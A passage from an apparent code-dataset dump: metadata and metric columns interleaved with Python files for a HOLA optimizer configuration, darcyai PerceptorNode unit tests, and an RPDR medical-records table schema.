| 0.546616
| 0.089109
| 0
| 0.615385
| 0
| 0
| 0.506699
| 0.477467
| 0
| 0
| 0
| 0
| 0.076923
| 1
| 0.076923
| false
| 0
| 0.076923
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8f8ca88e66d359f5dec52cfb9424d537ad58ba44
| 38
|
py
|
Python
|
qutil/format/__init__.py
|
jaisenc/qutil
|
1485fe486f4f2141f236d25addcdc34eceb3727d
|
[
"MIT"
] | null | null | null |
qutil/format/__init__.py
|
jaisenc/qutil
|
1485fe486f4f2141f236d25addcdc34eceb3727d
|
[
"MIT"
] | null | null | null |
qutil/format/__init__.py
|
jaisenc/qutil
|
1485fe486f4f2141f236d25addcdc34eceb3727d
|
[
"MIT"
] | null | null | null |
from . import df
from . import number
| 12.666667
| 20
| 0.736842
| 6
| 38
| 4.666667
| 0.666667
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 38
| 2
| 21
| 19
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8f9681a645806047e3e598d301181941a377caa0
| 26,670
|
py
|
Python
|
analysis/optimizers/config/hola_config.py
|
cristianmatache/HOLA
|
28baeae1ee165df702f6e230b29f8433d96c7009
|
[
"Apache-2.0"
] | 10
|
2022-02-17T21:36:43.000Z
|
2022-03-21T17:56:53.000Z
|
analysis/optimizers/config/hola_config.py
|
cristianmatache/HOLA
|
28baeae1ee165df702f6e230b29f8433d96c7009
|
[
"Apache-2.0"
] | null | null | null |
analysis/optimizers/config/hola_config.py
|
cristianmatache/HOLA
|
28baeae1ee165df702f6e230b29f8433d96c7009
|
[
"Apache-2.0"
] | 2
|
2022-02-17T21:37:31.000Z
|
2022-02-23T21:06:20.000Z
|
# Copyright 2021 BlackRock, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
from dataclasses import dataclass
from typing import Type, TypeVar
from typing_extensions import Literal
from hola.algorithm import HOLA
from hola.objective import ObjectivesSpec
from hola.params import ParamsSpec
from hola.tune import safe_n_components
THolaConfig = TypeVar("THolaConfig", bound="HolaConfig")
@dataclass
class HolaConfig: # pylint: disable=too-many-instance-attributes
min_samples: int | None
configuration: int
optimizer: Literal["hola", "sobol"]
gmm_sampler: Literal["uniform", "sobol"]
explore_sampler: Literal["uniform", "sobol"]
n_components: int
min_fit_samples: int
top_frac: float
gmm_reg: float
    def get_hola(self, params: ParamsSpec, objs: ObjectivesSpec) -> HOLA:
        """Build a HOLA optimizer from this config's tuning fields.

        Note: ``self.configuration`` and ``self.optimizer`` are not passed
        to HOLA here -- they only label which preset produced this config.
        """
        return HOLA(
            params,
            objs,
            min_samples=self.min_samples,
            gmm_sampler=self.gmm_sampler,
            explore_sampler=self.explore_sampler,
            n_components=self.n_components,
            min_fit_samples=self.min_fit_samples,
            gmm_reg=self.gmm_reg,
            top_frac=self.top_frac,
        )
    @classmethod
    def sobol(cls: Type[THolaConfig], n_iterations: int) -> THolaConfig:
        """Preset for the Sobol baseline: every sampler set to "sobol".

        ``min_samples`` is set to the full ``n_iterations``; the remaining
        fields use the same defaults as the "hola" presets.
        """
        return cls(
            min_samples=n_iterations,
            configuration=0,
            optimizer="sobol",
            gmm_sampler="sobol",
            explore_sampler="sobol",
            n_components=3,
            min_fit_samples=5,
            top_frac=0.25,
            gmm_reg=0.0005,
        )
@classmethod
def hola(cls: Type[THolaConfig], n_iterations: int, configuration: int, n_dim: int) -> THolaConfig:
# pylint: disable=too-many-branches,too-many-return-statements,too-many-statements
if configuration == 1:
return cls(
min_samples=max(n_dim**2, 20),
configuration=configuration,
optimizer="hola",
gmm_sampler="sobol",
explore_sampler="sobol",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 2:
return cls(
min_samples=n_iterations // 3,
configuration=configuration,
optimizer="hola",
gmm_sampler="sobol",
explore_sampler="sobol",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 3:
return cls(
min_samples=n_iterations // 2,
configuration=configuration,
optimizer="hola",
gmm_sampler="sobol",
explore_sampler="sobol",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 4:
return cls(
min_samples=max(n_dim**2, 20),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 5:
return cls(
min_samples=n_iterations // 3,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 6:
return cls(
min_samples=max(n_dim**2, 20),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="uniform",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 7:
return cls(
min_samples=n_iterations // 3,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="uniform",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 8:
return cls(
min_samples=50,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 9: # bad
return cls(
min_samples=max(n_dim**2, 20),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=4,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 10: # bad
return cls(
min_samples=max(n_dim**2, 20),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=5,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 11:
return cls(
min_samples=60,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 12:
return cls(
min_samples=60,
configuration=configuration,
optimizer="hola",
gmm_sampler="sobol",
explore_sampler="sobol",
n_components=3,
min_fit_samples=5,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 13:
return cls(
min_samples=60,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 14:
return cls(
min_samples=100,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 15:
return cls(
min_samples=n_iterations // 3,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 16:
return cls(
min_samples=60,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=10,
min_fit_samples=10,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 17:
return cls(
min_samples=60,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=15,
min_fit_samples=15,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 18:
return cls(
min_samples=25,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 19:
return cls(
min_samples=60,
configuration=configuration,
optimizer="hola",
gmm_sampler="sobol",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 20:
return cls(
min_samples=n_dim * 30,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 21:
return cls(
min_samples=n_dim * 20,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 22:
return cls(
min_samples=n_dim * 20,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.5,
gmm_reg=0.0005,
)
if configuration == 23:
return cls(
min_samples=10 * n_dim + 20,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 24:
return cls(
min_samples=10 * n_dim + 20,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.5,
gmm_reg=0.0005,
)
if configuration == 25:
return cls(
min_samples=min(n_iterations // 4, 10 * n_dim + 30),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 26:
return cls(
min_samples=min(n_iterations // 4, 10 * n_dim + 30),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.33,
gmm_reg=0.0005,
)
if configuration == 27:
return cls(
min_samples=min(n_iterations // 4, 10 * n_dim + 30),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.5,
gmm_reg=0.0005,
)
if configuration == 28:
return cls(
min_samples=60,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.33,
gmm_reg=0.0005,
)
if configuration == 29:
return cls(
min_samples=min(n_iterations // 4, 5 * n_dim + 35),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 30:
return cls(
min_samples=min(n_iterations // 4, 5 * n_dim + 35),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=7,
min_fit_samples=7,
top_frac=0.33,
gmm_reg=0.0005,
)
if configuration == 31:
return cls(
min_samples=max(min(n_iterations // 4, 10 * n_dim + 30), 60),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=15,
min_fit_samples=15,
top_frac=0.33,
gmm_reg=0.0005,
)
if configuration == 32:
return cls(
min_samples=max(min(n_iterations // 4, 10 * n_dim + 30), 60),
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=15,
min_fit_samples=15,
top_frac=0.25,
gmm_reg=0.0005,
)
if configuration == 33:
min_samples = get_min_samples_33(n_iterations, n_dim)
top_frac = 0.25
n_components = get_n_components(n_dim, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 34:
top_frac = 0.25
min_samples = get_min_samples_33(n_iterations, n_dim)
n_components = safe_n_components(15, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 35:
top_frac = 0.25
min_samples = get_min_samples_33(n_iterations, n_dim)
n_components = safe_n_components(15, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.001,
)
if configuration == 36:
top_frac = 0.25
min_samples = get_min_samples_33(n_iterations, n_dim)
n_components = safe_n_components(20, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.001,
)
# pq_data_3
if configuration == 37:
top_frac = 0.25
min_samples = 40
n_components = safe_n_components(7, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 38:
top_frac = 0.25
min_samples = 60
n_components = safe_n_components(7, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 39:
top_frac = 0.25
min_samples = 40
n_components = safe_n_components(15, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 40:
top_frac = 0.25
min_samples = 60
n_components = safe_n_components(15, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 41:
top_frac = 0.25
min_samples = 60
n_components = safe_n_components(3, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 42:
top_frac = 0.25
min_samples = 40
n_components = safe_n_components(3, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 43:
top_frac = 0.2
min_samples = 60
n_components = safe_n_components(7, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 44:
top_frac = 0.2
min_samples = 100
n_components = safe_n_components(7, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 45:
top_frac = 0.25
min_samples = 20
n_components = safe_n_components(7, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 46:
top_frac = 0.25
min_samples = 20
n_components = safe_n_components(15, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 47:
top_frac = 0.25
min_samples = 20
n_components = safe_n_components(3, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 48:
top_frac = 0.25
min_samples = min(n_iterations // 5, 2 * n_dim + 50)
n_components = safe_n_components(n_dim + 1, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 49:
top_frac = 0.2
min_samples = min(n_iterations // 5, 2 * n_dim + 50)
n_components = safe_n_components(n_dim + 1, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 50:
top_frac = 0.25
min_samples = min(n_iterations // 5, 2 * n_dim + 50)
n_components = safe_n_components(2 * n_dim, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
if configuration == 51:
top_frac = 0.2
min_samples = min(n_iterations // 5, 2 * n_dim + 50)
n_components = safe_n_components(2 * n_dim, min_samples, top_frac)
return cls(
min_samples=min_samples,
configuration=configuration,
optimizer="hola",
gmm_sampler="uniform",
explore_sampler="sobol",
n_components=n_components,
min_fit_samples=n_components,
top_frac=top_frac,
gmm_reg=0.0005,
)
raise ValueError("Unknown HOLA configuration")
def get_min_samples_33(n_iterations: int, n_dim: int) -> int:
    """Exploration budget for preset 33: a quarter of the run, capped by a
    dimension-scaled ceiling (more dimensions warrant more initial exploration).
    """
    quarter_of_run = n_iterations // 4  # small runs only explore for a quarter
    dim_scaled_cap = 2 * n_dim + 50  # larger search spaces get a larger cap
    return min(quarter_of_run, dim_scaled_cap)
def get_n_components(n_dim: int, min_samples: int, top_frac: float) -> int:
    """Request ``n_dim + 10`` GMM components, delegating to ``safe_n_components``
    to reconcile the request with the available sample budget.
    """
    requested_components = n_dim + 10
    return safe_n_components(requested_components, min_samples, top_frac)
| 35.56
| 113
| 0.491864
| 2,599
| 26,670
| 4.761062
| 0.074259
| 0.119121
| 0.057782
| 0.079845
| 0.85316
| 0.843543
| 0.827622
| 0.827622
| 0.827622
| 0.827622
| 0
| 0.049651
| 0.429846
| 26,670
| 749
| 114
| 35.607477
| 0.764106
| 0.031084
| 0
| 0.779006
| 0
| 0
| 0.035046
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006906
| false
| 0
| 0.01105
| 0.005525
| 0.107735
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8ffafdc284550d6e3de29dacf4c8c4343f97a09a
| 8,034
|
py
|
Python
|
src/darcyai/tests/perceptor/test_perceptor_node.py
|
edgeworx/darcyai
|
a92f0615b7cecdfe1317a8de533fdf12cedec89b
|
[
"MIT"
] | null | null | null |
src/darcyai/tests/perceptor/test_perceptor_node.py
|
edgeworx/darcyai
|
a92f0615b7cecdfe1317a8de533fdf12cedec89b
|
[
"MIT"
] | null | null | null |
src/darcyai/tests/perceptor/test_perceptor_node.py
|
edgeworx/darcyai
|
a92f0615b7cecdfe1317a8de533fdf12cedec89b
|
[
"MIT"
] | null | null | null |
import pytest
from unittest.mock import Mock, patch
from darcyai.perceptor.perceptor_node import PerceptorNode
from darcyai.tests.perceptor_mock import PerceptorMock
from darcyai.perception_object_model import PerceptionObjectModel
from darcyai.stream_data import StreamData
class TestPerceptor:
    """
    PerceptorNode tests.
    """

    @staticmethod
    def _build_node(name="parent", output_callback=None):
        # Helper: a PerceptorNode wired to a fresh mock perceptor and input
        # callback, with the arguments used throughout these tests.
        on_input = Mock()
        mock_perceptor = PerceptorMock(sleep=0)
        if output_callback is None:
            return PerceptorNode(
                name,
                mock_perceptor,
                on_input.method,
                multi=False,
                accelerator_idx=0)
        return PerceptorNode(
            name,
            mock_perceptor,
            on_input.method,
            output_callback,
            multi=False,
            accelerator_idx=0)

    def test_init_happy_path(self):
        node = self._build_node(name="name")
        assert node is not None

    def test_init_fails_when_perceptor_name_is_none(self):
        on_input = Mock()
        mock_perceptor = PerceptorMock(sleep=0)
        with pytest.raises(Exception) as context:
            PerceptorNode(
                None,
                mock_perceptor,
                on_input.method,
                multi=False,
                accelerator_idx=0)
        assert "perceptor_name is required" in str(context.value)

    def test_init_fails_when_perceptor_name_is_not_of_type_string(self):
        on_input = Mock()
        mock_perceptor = PerceptorMock(sleep=0)
        with pytest.raises(Exception) as context:
            PerceptorNode(
                1,
                mock_perceptor,
                on_input.method,
                multi=False,
                accelerator_idx=0)
        assert "perceptor_name must be a string" in str(context.value)

    def test_init_fails_when_perceptor_is_none(self):
        on_input = Mock()
        with pytest.raises(Exception) as context:
            PerceptorNode(
                "name",
                None,
                on_input.method,
                multi=False,
                accelerator_idx=0)
        assert "perceptor is required" in str(context.value)

    def test_init_fails_when_perceptor_is_not_of_type_perceptor(self):
        on_input = Mock()
        with pytest.raises(Exception) as context:
            PerceptorNode(
                "name",
                1,
                on_input.method,
                multi=False,
                accelerator_idx=0)
        assert "perceptor must be an instance of Perceptor" in str(
            context.value)

    def test_init_fails_when_input_callback_is_not_of_type_function(self):
        mock_perceptor = PerceptorMock(sleep=0)
        with pytest.raises(Exception) as context:
            PerceptorNode(
                "name",
                mock_perceptor,
                1,
                multi=False,
                accelerator_idx=0)
        assert "input_callback must be a function" in str(context.value)

    def test_init_fails_when_output_callback_is_not_of_type_function(self):
        on_input = Mock()
        mock_perceptor = PerceptorMock(sleep=0)
        with pytest.raises(Exception) as context:
            PerceptorNode(
                "name",
                mock_perceptor,
                on_input.method,
                output_callback=1,
                multi=False,
                accelerator_idx=0)
        assert "output_callback must be a function" in str(context.value)

    def test_add_child_perceptor_adds_perceptor_to_children(self):
        node = self._build_node()
        node.add_child_perceptor("child")
        children = node.get_child_perceptors()
        assert len(children) == 1
        assert children[0] == "child"

    def test_remove_child_perceptor_removes_perceptor_from_children(self):
        node = self._build_node()
        node.add_child_perceptor("child")
        assert len(node.get_child_perceptors()) == 1
        node.remove_child_perceptor("child")
        assert len(node.get_child_perceptors()) == 0

    def test_add_child_perceptor_fails_when_perceptor_name_is_none(self):
        node = self._build_node()
        with pytest.raises(Exception) as context:
            node.add_child_perceptor(None)
        assert "perceptor_name is required" in str(context.value)

    def test_add_child_perceptor_fails_when_perceptor_name_is_not_of_type_string(
            self):
        node = self._build_node()
        with pytest.raises(Exception) as context:
            node.add_child_perceptor(1)
        assert "perceptor_name must be a string" in str(context.value)

    def test_get_child_perceptors_returns_list_of_child_perceptors(self):
        node = self._build_node()
        node.add_child_perceptor("child1")
        node.add_child_perceptor("child2")
        assert len(node.get_child_perceptors()) == 2

    def test_run_calls_output_callback(self):
        on_output = Mock()
        node = self._build_node(output_callback=on_output.method)
        payload = "Hello!"
        stream_data = StreamData([1, 2, 3], 1)
        pom = PerceptionObjectModel()
        with patch.object(PerceptorMock, "run", return_value=payload):
            node.run(stream_data, pom)
        on_output.method.assert_called_once_with(payload, pom)

    def test_run_returns_result_of_output_callback(self):
        expected = "output_callback"
        on_output = Mock()
        on_output.method.return_value = expected
        node = self._build_node(output_callback=on_output.method)
        stream_data = StreamData([1, 2, 3], 1)
        pom = PerceptionObjectModel()
        assert node.run(stream_data, pom) == expected

    def test_run_returns_result_of_perceptor(self):
        node = self._build_node()
        expected = "perceptor_result"
        stream_data = StreamData([1, 2, 3], 1)
        pom = PerceptionObjectModel()
        with patch.object(PerceptorMock, "run", return_value=expected):
            assert node.run(stream_data, pom) == expected
| 33.061728
| 81
| 0.631441
| 862
| 8,034
| 5.530162
| 0.102088
| 0.085588
| 0.099853
| 0.075519
| 0.861129
| 0.85022
| 0.814558
| 0.763373
| 0.752465
| 0.709041
| 0
| 0.00923
| 0.29873
| 8,034
| 242
| 82
| 33.198347
| 0.836883
| 0.002489
| 0
| 0.769634
| 0
| 0
| 0.048387
| 0
| 0
| 0
| 0
| 0
| 0.089005
| 1
| 0.078534
| false
| 0
| 0.031414
| 0
| 0.115183
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
890959ee75f3ec356a4dec0962922b3df32e5949
| 163,037
|
py
|
Python
|
rpdrdefs.py
|
nareynolds/pyRPDR
|
6c0634c04f6622d608adf14b67cf0ca2659d3fc9
|
[
"MIT"
] | 2
|
2020-12-30T18:14:51.000Z
|
2021-01-18T03:32:37.000Z
|
rpdrdefs.py
|
nareynolds/pyRPDR
|
6c0634c04f6622d608adf14b67cf0ca2659d3fc9
|
[
"MIT"
] | null | null | null |
rpdrdefs.py
|
nareynolds/pyRPDR
|
6c0634c04f6622d608adf14b67cf0ca2659d3fc9
|
[
"MIT"
] | 2
|
2015-07-14T18:30:44.000Z
|
2019-10-17T19:29:59.000Z
|
# rpdrtables.py
# get csv tools
from csv import QUOTE_NONE
# get namedtuple
from collections import namedtuple
#--------------------------------------------------------------------------------------------
# Foreign-key reference from one RPDR table column to another (table, column).
ForeignKeyRef = namedtuple('ForeignKeyRef', ['table', 'column'])
# Date/time reformatting rule: parse with `format`, rewrite with `reformat`.
DateReformat = namedtuple('DateReformat', ['format', 'reformat'])
SQLITE_DATE_FORMAT = '%Y-%m-%d'
# One RPDR table column: name, SQL type/constraints, and timeline hints.
TableColumn = namedtuple(
    'TableColumn',
    ['name', 'type', 'primaryKey', 'index', 'unique', 'notNull',
     'foreignKeyRef', 'dateReformat', 'timelineDate', 'timelineBlurb'],
)
# CSV dialect description, plus the standard pipe-delimited RPDR flavour.
CsvDialect = namedtuple(
    'CsvDialect',
    ['delimiter', 'doublequote', 'escapechar', 'lineterminator',
     'quotechar', 'quoting', 'skipinitialspace', 'strict'],
)
StandardCsvDialect = CsvDialect(
    delimiter='|',
    doublequote=True,
    escapechar=None,
    lineterminator='\r\n',
    quotechar='',
    quoting=QUOTE_NONE,
    skipinitialspace=True,
    strict=False,
)
# An RPDR table: its columns, file extension, CSV flavour, and timeline usage.
Table = namedtuple(
    'Table',
    ['name', 'fileExt', 'columns', 'csvDialect',
     'freeTextReportInLastColumn', 'useInTimeline'],
)
#--------------------------------------------------------------------------------------------
# Car RPDR table definition.  Every column is plain TEXT with no constraints
# unless overridden below.
_CAR_COLUMN_DEFAULTS = dict(
    type="TEXT",
    primaryKey=False,
    index=False,
    unique=False,
    notNull=False,
    foreignKeyRef=None,
    timelineDate=False,
    timelineBlurb=False,
    dateReformat=None,
)
Car = Table(
    name='Car',
    fileExt='txt',
    csvDialect=StandardCsvDialect,
    freeTextReportInLastColumn=True,
    useInTimeline=True,
    columns=[
        # Patient identifier: indexed and required, but not unique (many rows per patient).
        TableColumn(name="EMPI", **{**_CAR_COLUMN_DEFAULTS, "index": True, "notNull": True}),
        TableColumn(name="MRN_Type", **_CAR_COLUMN_DEFAULTS),
        TableColumn(name="MRN", **_CAR_COLUMN_DEFAULTS),
        TableColumn(name="Report_Number", **_CAR_COLUMN_DEFAULTS),
        TableColumn(name="MID", **_CAR_COLUMN_DEFAULTS),
        # Report timestamp supplies the timeline date, re-formatted for SQLite.
        TableColumn(name="Report_Date_Time", **{
            **_CAR_COLUMN_DEFAULTS,
            "type": "DATETIME",
            "timelineDate": True,
            "dateReformat": DateReformat(format='%m/%d/%Y %I:%M:%S %p', reformat=SQLITE_DATE_FORMAT),
        }),
        # Short description used as the timeline blurb.
        TableColumn(name="Report_Description", **{**_CAR_COLUMN_DEFAULTS, "timelineBlurb": True}),
        TableColumn(name="Report_Status", **_CAR_COLUMN_DEFAULTS),
        TableColumn(name="Report_Type", **_CAR_COLUMN_DEFAULTS),
        TableColumn(name="Report_Text", **_CAR_COLUMN_DEFAULTS),
    ],
)
#--------------------------------------------------------------------------------------------
# Con RPDR table definition (one row per patient: names, contact details,
# insurance, and care-provider fields).  Every column is plain TEXT with no
# constraints unless overridden below.
_CON_COLUMN_DEFAULTS = dict(
    type="TEXT",
    primaryKey=False,
    index=False,
    unique=False,
    notNull=False,
    foreignKeyRef=None,
    timelineDate=False,
    timelineBlurb=False,
    dateReformat=None,
)
Con = Table(
    name='Con',
    fileExt='txt',
    csvDialect=StandardCsvDialect,
    freeTextReportInLastColumn=False,
    useInTimeline=False,
    columns=(
